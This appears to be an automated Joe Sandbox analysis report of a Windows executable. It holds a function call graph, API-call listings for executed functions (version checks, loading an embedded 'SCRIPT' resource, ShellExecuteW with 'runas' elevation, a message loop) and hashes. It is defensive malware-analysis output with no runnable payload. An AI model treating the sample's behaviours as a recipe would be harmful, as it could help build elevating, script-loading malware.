calls 96919->96920 96921 592dda 96920->96921 96922 593598 96921->96922 96923 59a961 22 API calls 96922->96923 96924 5935aa 96923->96924 96925 593aa2 23 API calls 96924->96925 96926 5935b5 96925->96926 96927 5d32eb 96926->96927 96928 5935c0 96926->96928 96933 5d330d 96927->96933 96971 5ace60 41 API calls 96927->96971 96929 59515f 22 API calls 96928->96929 96931 5935cc 96929->96931 96965 5935f3 96931->96965 96934 5935df 96934->96914 96936 594ecb 94 API calls 96935->96936 96937 5944cd 96936->96937 96938 5d3833 96937->96938 96940 594ecb 94 API calls 96937->96940 96939 602cf9 80 API calls 96938->96939 96941 5d3848 96939->96941 96942 5944e1 96940->96942 96943 5d384c 96941->96943 96944 5d3869 96941->96944 96942->96938 96945 5944e9 96942->96945 96946 594f39 68 API calls 96943->96946 96947 5afe0b 22 API calls 96944->96947 96948 5d3854 96945->96948 96949 5944f5 96945->96949 96946->96948 96958 5d38ae 96947->96958 96979 5fda5a 82 API calls 96948->96979 96978 59940c 136 API calls 2 library calls 96949->96978 96952 5d3862 96952->96944 96953 592e31 96954 5d3a5f 96956 5d3a67 96954->96956 96955 594f39 68 API calls 96955->96956 96956->96955 96983 5f989b 82 API calls __wsopen_s 96956->96983 96957 59a4a1 22 API calls 96957->96958 96958->96954 96958->96956 96958->96957 96962 599cb3 22 API calls 96958->96962 96972 593ff7 96958->96972 96980 5f967e 22 API calls __fread_nolock 96958->96980 96981 5f95ad 42 API calls _wcslen 96958->96981 96982 600b5a 22 API calls 96958->96982 96962->96958 96966 593605 96965->96966 96970 593624 __fread_nolock 96965->96970 96968 5afe0b 22 API calls 96966->96968 96967 5afddb 22 API calls 96969 59363b 96967->96969 96968->96970 96969->96934 96970->96967 96971->96927 96973 59400a 96972->96973 96975 5940ae 96972->96975 96974 5afe0b 22 API calls 96973->96974 96977 59403c 96973->96977 96974->96977 96975->96958 96976 5afddb 22 API calls 96976->96977 96977->96975 96977->96976 96978->96953 96979->96952 96980->96958 96981->96958 96982->96958 96983->96956 96984 591044 96989 5910f3 96984->96989 96986 59104a 97025 5b00a3 29 API calls __onexit 96986->97025 96988 591054 97026 591398 96989->97026 96993 59116a 96994 59a961 22 API calls 96993->96994 96995 591174 96994->96995 96996 59a961 22 API calls 96995->96996 96997 59117e 96996->96997 96998 59a961 22 API calls 96997->96998 96999 591188 96998->96999 97000 59a961 22 API calls 96999->97000 97001 5911c6 97000->97001 97002 59a961 22 API calls 97001->97002 97003 591292 97002->97003 97036 59171c 97003->97036 97007 5912c4 97008 59a961 22 API calls 97007->97008 97009 5912ce 97008->97009 97010 5a1940 9 API calls 97009->97010 97011 5912f9 97010->97011 97057 591aab 97011->97057 97013 591315 97014 591325 GetStdHandle 97013->97014 97015 59137a 97014->97015 97016 5d2485 97014->97016 97020 591387 OleInitialize 97015->97020 97016->97015 97017 5d248e 97016->97017 97018 5afddb 22 API calls 97017->97018 97019 5d2495 97018->97019 97064 60011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97019->97064 97020->96986 97022 5d249e 97065 600944 CreateThread 97022->97065 97024 5d24aa CloseHandle 97024->97015 97025->96988 97066 5913f1 97026->97066 97029 5913f1 22 API calls 97030 5913d0 97029->97030 97031 59a961 22 API calls 97030->97031 97032 5913dc 97031->97032 97033 596b57 22 API calls 97032->97033 97034 591129 97033->97034 97035 591bc3 6 API calls 97034->97035 97035->96993 97037 59a961 22 API calls 97036->97037 97038 59172c 97037->97038 97039 59a961 22 API calls 97038->97039 97040 591734 97039->97040 97041 59a961 22 API calls 97040->97041 97042 59174f 97041->97042 97043 5afddb 22 API calls 97042->97043 97044 59129c 97043->97044 97045 591b4a 97044->97045 97046 591b58 97045->97046 97047 59a961 22 API calls 97046->97047 97048 591b63 97047->97048 97049 59a961 22 API calls 97048->97049 97050 591b6e 97049->97050 97051 59a961 22 API calls 97050->97051 97052 591b79 97051->97052 97053 59a961 22 API calls 97052->97053 97054 591b84 97053->97054 97055 5afddb 22 API calls 97054->97055 97056 591b96 RegisterWindowMessageW 97055->97056 97056->97007 97058 5d272d 97057->97058 97059 591abb 97057->97059 97073 603209 23 API calls 97058->97073 97060 5afddb 22 API calls 97059->97060 97062 591ac3 97060->97062 97062->97013 97063 5d2738 97064->97022 97065->97024 97074 60092a 28 API calls 97065->97074 97067 59a961 22 API calls 97066->97067 97068 5913fc 97067->97068 97069 59a961 22 API calls 97068->97069 97070 591404 97069->97070 97071 59a961 22 API calls 97070->97071 97072 5913c6 97071->97072 97072->97029 97073->97063 97075 5c8402 97080 5c81be 97075->97080 97079 5c842a 97085 5c81ef try_get_first_available_module 97080->97085 97082 5c83ee 97099 5c27ec 26 API calls pre_c_initialization 97082->97099 97084 5c8343 97084->97079 97092 5d0984 97084->97092 97085->97085 97088 5c8338 97085->97088 97095 5b8e0b 40 API calls 2 library calls 97085->97095 97087 5c838c 97087->97088 97096 5b8e0b 40 API calls 2 library calls 97087->97096 97088->97084 97098 5bf2d9 20 API calls __dosmaperr 97088->97098 97090 5c83ab 97090->97088 97097 5b8e0b 40 API calls 2 library calls 97090->97097 97100 5d0081 97092->97100 97094 5d099f 97094->97079 97095->97087 97096->97090 97097->97088 97098->97082 97099->97084 97102 5d008d __FrameHandler3::FrameUnwindToState 97100->97102 97101 5d009b 97157 5bf2d9 20 API calls __dosmaperr 97101->97157 97102->97101 97105 5d00d4 97102->97105 97104 5d00a0 97158 5c27ec 26 API calls pre_c_initialization 97104->97158 97111 5d065b 97105->97111 97110 5d00aa __fread_nolock 97110->97094 97112 5d0678 97111->97112 97113 5d068d 97112->97113 97114 5d06a6 97112->97114 97174 5bf2c6 20 API calls __dosmaperr 97113->97174 97160 5c5221 97114->97160 97117 5d0692 97175 5bf2d9 20 API calls __dosmaperr 97117->97175 97118 5d06ab 97119 5d06cb 97118->97119 97120 5d06b4 97118->97120 97173 5d039a CreateFileW 97119->97173 97176 5bf2c6 20 API calls __dosmaperr 97120->97176 97124 5d06b9 97177 5bf2d9 20 API calls __dosmaperr 97124->97177 97126 5d0781 GetFileType 97128 5d078c GetLastError 97126->97128 97129 5d07d3 97126->97129 97127 5d0756 GetLastError 97179 5bf2a3 20 API calls 2 library calls 97127->97179 97180 5bf2a3 20 API calls 2 library calls 97128->97180 97182 5c516a 21 API calls 3 library calls 97129->97182 97130 5d0704 97130->97126 97130->97127 97178 5d039a CreateFileW 97130->97178 97133 5d079a CloseHandle 97133->97117 97135 5d07c3 97133->97135 97181 5bf2d9 20 API calls __dosmaperr 97135->97181 97137 5d0749 97137->97126 97137->97127 97139 5d07c8 97139->97117 97140 5d07f4 97141 5d0840 97140->97141 97183 5d05ab 72 API calls 4 library calls 97140->97183 97145 5d086d 97141->97145 97184 5d014d 72 API calls 4 library calls 97141->97184 97144 5d0866 97144->97145 97146 5d087e 97144->97146 97147 5c86ae __wsopen_s 29 API calls 97145->97147 97148 5d00f8 97146->97148 97149 5d08fc CloseHandle 97146->97149 97147->97148 97159 5d0121 LeaveCriticalSection __wsopen_s 97148->97159 97185 5d039a CreateFileW 97149->97185 97151 5d0927 97152 5d0931 GetLastError 97151->97152 97153 5d095d 97151->97153 97186 5bf2a3 20 API calls 2 library calls 97152->97186 97153->97148 97155 5d093d 97187 5c5333 21 API calls 3 library calls 97155->97187 97157->97104 97158->97110 97159->97110 97161 5c522d __FrameHandler3::FrameUnwindToState 97160->97161 97188 5c2f5e EnterCriticalSection 97161->97188 97163 5c5234 97164 5c5259 97163->97164 97169 5c52c7 EnterCriticalSection 97163->97169 97171 5c527b 97163->97171 97192 5c5000 21 API calls 3 library calls 97164->97192 97167 5c52a4 __fread_nolock 97167->97118 97168 5c525e 97168->97171 97193 5c5147 EnterCriticalSection 97168->97193 97170 5c52d4 LeaveCriticalSection 97169->97170 97169->97171 97170->97163 97189 5c532a 97171->97189 97173->97130 97174->97117 97175->97148 97176->97124 97177->97117 97178->97137 97179->97117 97180->97133 97181->97139 97182->97140 97183->97141 97184->97144 97185->97151 97186->97155 97187->97153 97188->97163 97194 5c2fa6 LeaveCriticalSection 97189->97194 97191 5c5331 97191->97167 97192->97168 97193->97171 97194->97191 97195 5e2a00 97209 59d7b0 ISource 97195->97209 97196 59db11 PeekMessageW 97196->97209 97197 59d807 GetInputState 97197->97196 97197->97209 97199 5e1cbe TranslateAcceleratorW 97199->97209 97200 59db8f PeekMessageW 97200->97209 97201 59db73 TranslateMessage DispatchMessageW 97201->97200 97202 59da04 timeGetTime 97202->97209 97203 59dbaf Sleep 97217 59dbc0 97203->97217 97204 5e2b74 Sleep 97204->97217 97205 5e1dda timeGetTime 97256 5ae300 23 API calls 97205->97256 97206 5ae551 timeGetTime 97206->97217 97209->97196 97209->97197 97209->97199 97209->97200 97209->97201 97209->97202 97209->97203 97209->97204 97209->97205 97214 59d9d5 97209->97214 97223 59ec40 235 API calls 97209->97223 97224 5a1310 235 API calls 97209->97224 97225 59bf40 235 API calls 97209->97225 97227 59dfd0 97209->97227 97250 5aedf6 97209->97250 97255 59dd50 235 API calls 97209->97255 97257 603a2a 23 API calls 97209->97257 97258 60359c 82 API calls __wsopen_s 97209->97258 97210 5e2c0b GetExitCodeProcess 97212 5e2c37 CloseHandle 97210->97212 97213 5e2c21 WaitForSingleObject 97210->97213 97212->97217 97213->97209 97213->97212 97215 5e2a31 97215->97214 97216 6229bf GetForegroundWindow 97216->97217 97217->97206 97217->97209 97217->97210 97217->97214 97217->97215 97217->97216 97218 5e2ca9 Sleep 97217->97218 97259 615658 23 API calls 97217->97259 97260 5fe97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97217->97260 97261 5fd4dc 47 API calls 97217->97261 97218->97209 97223->97209 97224->97209 97225->97209 97228 59e010 97227->97228 97238 59e0dc ISource 97228->97238 97264 5b0242 5 API calls __Init_thread_wait 97228->97264 97231 5e2fca 97234 59a961 22 API calls 97231->97234 97231->97238 97232 59e3e1 97232->97209 97233 59a961 22 API calls 97233->97238 97236 5e2fe4 97234->97236 97265 5b00a3 29 API calls __onexit 97236->97265 97238->97232 97238->97233 97242 59ec40 235 API calls 97238->97242 97244 60359c 82 API calls 97238->97244 97246 59a8c7 22 API calls 97238->97246 97247 5a04f0 22 API calls 97238->97247 97262 59a81b 41 API calls 97238->97262 97263 5aa308 235 API calls 97238->97263 97267 5b0242 5 API calls __Init_thread_wait 97238->97267 97268 5b00a3 29 API calls __onexit 97238->97268 97269 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97238->97269 97270 6147d4 235 API calls 97238->97270 97271 6168c1 235 API calls 97238->97271 97241 5e2fee 97266 5b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97241->97266 97242->97238 97244->97238 97246->97238 97247->97238 97251 5aee09 97250->97251 97252 5aee12 97250->97252 97251->97209 97252->97251 97253 5aee36 IsDialogMessageW 97252->97253 97254 5eefaf GetClassLongW 97252->97254 97253->97251 97253->97252 97254->97252 97254->97253 97255->97209 97256->97209 97257->97209 97258->97209 97259->97217 97260->97217 97261->97217 97262->97238 97263->97238 97264->97231 97265->97241 97266->97238 97267->97238 97268->97238 97269->97238 97270->97238 97271->97238 97272 5e3a41 97276 6010c0 97272->97276 97274 5e3a4c 97275 6010c0 53 API calls 97274->97275 97275->97274 97277 6010fa 97276->97277 97282 6010cd 97276->97282 97277->97274 97278 6010fc 97288 5afa11 53 API calls 97278->97288 97279 601101 97281 597510 53 API calls 97279->97281 97283 601108 97281->97283 97282->97277 97282->97278 97282->97279 97285 6010f4 97282->97285 97284 596350 22 API calls 97283->97284 97284->97277 97287 59b270 39 API calls 97285->97287 97287->97277 97288->97279

                                                  Executed Functions

                                                  Function 005942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 234 5942de-59434d call 59a961 GetVersionExW call 596b57 239 5d3617-5d362a 234->239 240 594353 234->240 242 5d362b-5d362f 239->242 241 594355-594357 240->241 245 59435d-5943bc call 5993b2 call 5937a0 241->245 246 5d3656 241->246 243 5d3631 242->243 244 5d3632-5d363e 242->244 243->244 244->242 247 5d3640-5d3642 244->247 263 5d37df-5d37e6 245->263 264 5943c2-5943c4 245->264 250 5d365d-5d3660 246->250 247->241 249 5d3648-5d364f 247->249 249->239 252 5d3651 249->252 253 59441b-594435 GetCurrentProcess IsWow64Process 250->253 254 5d3666-5d36a8 250->254 252->246 256 594494-59449a 253->256 257 594437 253->257 254->253 258 5d36ae-5d36b1 254->258 260 59443d-594449 256->260 257->260 261 5d36db-5d36e5 258->261 262 5d36b3-5d36bd 258->262 265 59444f-59445e LoadLibraryA 260->265 266 5d3824-5d3828 GetSystemInfo 260->266 270 5d36f8-5d3702 261->270 271 5d36e7-5d36f3 261->271 267 5d36bf-5d36c5 262->267 268 5d36ca-5d36d6 262->268 272 5d37e8 263->272 273 5d3806-5d3809 263->273 264->250 269 5943ca-5943dd 264->269 279 59449c-5944a6 GetSystemInfo 265->279 280 594460-59446e GetProcAddress 265->280 267->253 268->253 281 5943e3-5943e5 269->281 282 5d3726-5d372f 269->282 275 5d3715-5d3721 270->275 276 5d3704-5d3710 270->276 271->253 274 5d37ee 272->274 277 5d380b-5d381a 273->277 278 5d37f4-5d37fc 273->278 274->278 275->253 276->253 277->274 287 5d381c-5d3822 277->287 278->273 289 594476-594478 279->289 280->279 288 594470-594474 GetNativeSystemInfo 280->288 283 5d374d-5d3762 281->283 284 5943eb-5943ee 281->284 285 5d373c-5d3748 282->285 286 5d3731-5d3737 282->286 292 5d376f-5d377b 283->292 293 5d3764-5d376a 283->293 290 5d3791-5d3794 284->290 291 5943f4-59440f 284->291 285->253 286->253 287->278 288->289 294 59447a-59447b FreeLibrary 289->294 295 594481-594493 289->295 290->253 298 5d379a-5d37c1 290->298 296 594415 291->296 297 5d3780-5d378c 291->297 292->253 293->253 294->295 296->253 297->253 299 5d37ce-5d37da 298->299 300 5d37c3-5d37c9 298->300 299->253 300->253
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 0059430D
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • GetCurrentProcess.KERNEL32(?,0062CB64,00000000,?,?), ref: 00594422
                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00594429
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00594454
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00594466
                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00594474
                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0059447B
                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 005944A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                  • API String ID: 3290436268-3101561225
                                                  • Opcode ID: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
                                                  • Instruction ID: 59cfebe527b089dd151a32da9f4bd61475b013321412b9b81f2c241b707ef354
                                                  • Opcode Fuzzy Hash: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
                                                  • Instruction Fuzzy Hash: DBA1846590A6D0DFCF21CB6D7D455997FA77B37300B0C789AD047BBB22D2A04A09CB62
                                                  Function 005942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1506 5942a2-5942ba CreateStreamOnHGlobal 1507 5942da-5942dd 1506->1507 1508 5942bc-5942d3 FindResourceExW 1506->1508 1509 5942d9 1508->1509 1510 5d35ba-5d35c9 LoadResource 1508->1510 1509->1507 1510->1509 1511 5d35cf-5d35dd SizeofResource 1510->1511 1511->1509 1512 5d35e3-5d35ee LockResource 1511->1512 1512->1509 1513 5d35f4-5d3612 1512->1513 1513->1509
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005950AA,?,?,00000000,00000000), ref: 005942B2
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005950AA,?,?,00000000,00000000), ref: 005942C9
                                                  • LoadResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35BE
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35D3
                                                  • LockResource.KERNEL32(005950AA,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20,?), ref: 005D35E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
                                                  • Instruction ID: c58cc078028b7ab471cb884d86139706a82dc821f861ed61b9782f66d4059ae2
                                                  • Opcode Fuzzy Hash: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
                                                  • Instruction Fuzzy Hash: 2D117C74201B01BFEB218B65DC48F6B7FBAFFC5B61F208169B40296250DB71DD019A20
                                                  Function 005D2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                                                    • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00652224), ref: 005D2C10
                                                  • ShellExecuteW.SHELL32(00000000,?,?,00652224), ref: 005D2C17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                  • String ID: runas
                                                  • API String ID: 448630720-4000483414
                                                  • Opcode ID: d40e24da04b6e9107b77a83de8c5c214fd3494978cc8f478a6a5a048d1ff557a
                                                  • Instruction ID: bca6f6ac0bc7eb734ce263fa3e499904aece981b3ef6e6cabe5fa014c51b917b
                                                  • Opcode Fuzzy Hash: d40e24da04b6e9107b77a83de8c5c214fd3494978cc8f478a6a5a048d1ff557a
                                                  • Instruction Fuzzy Hash: C611B431108342AACF14FF64D8599BE7FE6BBE1351F48582DF542570A2CF658A0AC752
                                                  Function 005FDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,005D5222), ref: 005FDBCE
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 005FDBDD
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 005FDBEE
                                                  • FindClose.KERNEL32(00000000), ref: 005FDBFA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                  • String ID:
                                                  • API String ID: 2695905019-0
                                                  • Opcode ID: 5a0ec0232fa3c942d4399bbabc1f8448952f4cd3a8da4c4a059dc0d5afede89b
                                                  • Instruction ID: 83f76727a8920456fb2ad43d6dac1dd2f5305179a1a45f547e74eeff6681da28
                                                  • Opcode Fuzzy Hash: 5a0ec0232fa3c942d4399bbabc1f8448952f4cd3a8da4c4a059dc0d5afede89b
                                                  • Instruction Fuzzy Hash: D7F0A03081191897C3306B78AC0E8BE3B7EAE01334B104702F976C21E0EBB45E568AE5
                                                  Function 0059BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: p#f
                                                  • API String ID: 3964851224-2982675022
                                                  • Opcode ID: 7e23c053a2187a679ee0dcae9d38da6a6480fb220bb9fa9b11f30ce599099772
                                                  • Instruction ID: 9c960572e768607366a98b9885df9b728f1a62109f421b93ca26216ded672178
                                                  • Opcode Fuzzy Hash: 7e23c053a2187a679ee0dcae9d38da6a6480fb220bb9fa9b11f30ce599099772
                                                  • Instruction Fuzzy Hash: EAA25A706083419FDB14CF19C484B2ABFE1BF89304F14996DE99A9B392D771EC85CB92
                                                  Function 0059D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetInputState.USER32 ref: 0059D807
                                                  • timeGetTime.WINMM ref: 0059DA07
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB28
                                                  • TranslateMessage.USER32(?), ref: 0059DB7B
                                                  • DispatchMessageW.USER32(?), ref: 0059DB89
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB9F
                                                  • Sleep.KERNEL32(0000000A), ref: 0059DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                  • String ID:
                                                  • API String ID: 2189390790-0
                                                  • Opcode ID: 43f310ce9abb03e30fe3eec2744ae3fac39fa5826b4c489199b503a050caf279
                                                  • Instruction ID: fd9fc9c21d8c55fd616dd1301f1b95b6eee7b6f04adbe85205c80ed69c82075a
                                                  • Opcode Fuzzy Hash: 43f310ce9abb03e30fe3eec2744ae3fac39fa5826b4c489199b503a050caf279
                                                  • Instruction Fuzzy Hash: 5942E370608782DFDB28DF25C848BAABFF5BF85314F14491DE49987291D774E844CBA2
                                                  Function 00592CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00592D07
                                                  • RegisterClassExW.USER32(00000030), ref: 00592D31
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
                                                  • LoadIconW.USER32(000000A9), ref: 00592D85
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
